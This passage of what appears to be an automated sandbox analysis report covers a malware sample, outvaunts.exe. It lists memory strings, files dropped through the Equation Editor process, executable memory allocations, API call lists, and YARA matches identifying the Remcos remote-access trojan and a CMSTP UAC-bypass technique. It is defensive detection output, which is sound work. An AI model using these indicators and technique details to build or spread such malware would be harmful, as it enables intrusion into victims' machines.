              Source: outvaunts.exeString found in binary or memory: This is a third-party compiled AutoIt script.
              Source: outvaunts.exe, 00000006.00000002.461070341.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_a04bfb03-1
              Source: outvaunts.exe, 00000006.00000002.461070341.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_bcb0a91b-0
              Source: outvaunts.exe, 00000007.00000002.462634381.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_270951dc-5
              Source: outvaunts.exe, 00000007.00000002.462634381.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_acf1e28e-2
              Source: outvaunts.exe, 00000008.00000002.464279743.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_c679bab2-0
              Source: outvaunts.exe, 00000008.00000002.464279743.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_c7ca583d-c
              Source: outvaunts.exe, 00000009.00000002.466798345.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_5eef1ad1-3
              Source: outvaunts.exe, 00000009.00000002.466798345.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_0933ed2f-3
              Source: outvaunts.exe, 0000000A.00000002.468525996.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_4966de35-5
              Source: outvaunts.exe, 0000000A.00000002.468525996.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_919536a6-c
              Source: outvaunts.exe, 0000000B.00000002.470454898.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_7b741f2c-7
              Source: outvaunts.exe, 0000000B.00000002.470454898.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_3d1ebab6-f
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\HKP098767890HJ[1].exe
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Temp\kudo.exe
              Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 770B0000 page execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Memory allocated: 770B0000 page execute and read and write
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Memory allocated: 770B0000 page execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_2_00803633 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_2_0088C1AC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_2_0088C498 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_2_0088C5FE DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_2_0088C57D SendMessageW,NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_2_0088C88F NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_2_0088C8BE NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_2_0088C860 NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_2_0088C909 NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_2_0088C93E ClientToScreen,NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_2_0088CABC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_2_0088CA7C GetWindowLongW,NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_2_00801287 NtdllDialogWndProc_W,GetSysColor,SetBkColor,73666F36,NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_2_00801290 NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_2_0088D3B8 NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_2_0088D43E GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_2_008016B5 NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_2_008016DE GetParent,NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_2_0080167D NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_2_0088D78C NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_2_0080189B NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_2_0088BC5D NtdllDialogWndProc_W,CallWindowProcW
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_2_0088BF8C ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_2_0088BF30 NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 6_2_01363633 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 6_2_013EC1AC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 6_2_013EC57D SendMessageW,NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 6_2_013EC5FE DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 6_2_013EC498 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 6_2_013EC93E ClientToScreen,NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 6_2_013EC909 NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 6_2_013EC860 NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 6_2_013EC8BE NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 6_2_013EC88F NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 6_2_013ECA7C GetWindowLongW,NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 6_2_013ECABC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 6_2_013ED3B8 NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 6_2_01361290 NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 6_2_01361287 NtdllDialogWndProc_W,GetSysColor,SetBkColor,73666F36,NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 6_2_013ED43E GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 6_2_013ED78C NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 6_2_0136167D NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 6_2_013616B5 NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 6_2_013616DE GetParent,NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 6_2_0136189B NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 6_2_013EBC5D NtdllDialogWndProc_W,CallWindowProcW
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 6_2_013EBF30 NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 6_2_013EBF8C ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_2_0086A1EF GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_2_00858310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,756C1AAC,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_2_008651BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 6_2_013C51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: String function: 01367DE1 appears 36 times
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: String function: 01388900 appears 42 times
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: String function: 01380AE3 appears 70 times
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: String function: 00828900 appears 42 times
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: String function: 00807DE1 appears 35 times
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: String function: 00820AE3 appears 70 times
              Source: 30.2.outvaunts.exe.1190000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 30.2.outvaunts.exe.1190000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 30.2.outvaunts.exe.1190000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 21.2.outvaunts.exe.fc0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 21.2.outvaunts.exe.fc0000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 21.2.outvaunts.exe.fc0000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 7.2.outvaunts.exe.1080000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 7.2.outvaunts.exe.1080000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 7.2.outvaunts.exe.1080000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 12.2.outvaunts.exe.10d0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 12.2.outvaunts.exe.10d0000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 12.2.outvaunts.exe.10d0000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 15.2.outvaunts.exe.cd0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 15.2.outvaunts.exe.cd0000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 15.2.outvaunts.exe.cd0000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 32.2.outvaunts.exe.1160000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 32.2.outvaunts.exe.1160000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 32.2.outvaunts.exe.1160000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 37.2.outvaunts.exe.fb0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 37.2.outvaunts.exe.fb0000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 37.2.outvaunts.exe.fb0000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 27.2.outvaunts.exe.2930000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 27.2.outvaunts.exe.2930000.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 27.2.outvaunts.exe.2930000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 31.2.outvaunts.exe.1190000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 31.2.outvaunts.exe.1190000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 31.2.outvaunts.exe.1190000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 33.2.outvaunts.exe.10c0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 33.2.outvaunts.exe.10c0000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 33.2.outvaunts.exe.10c0000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
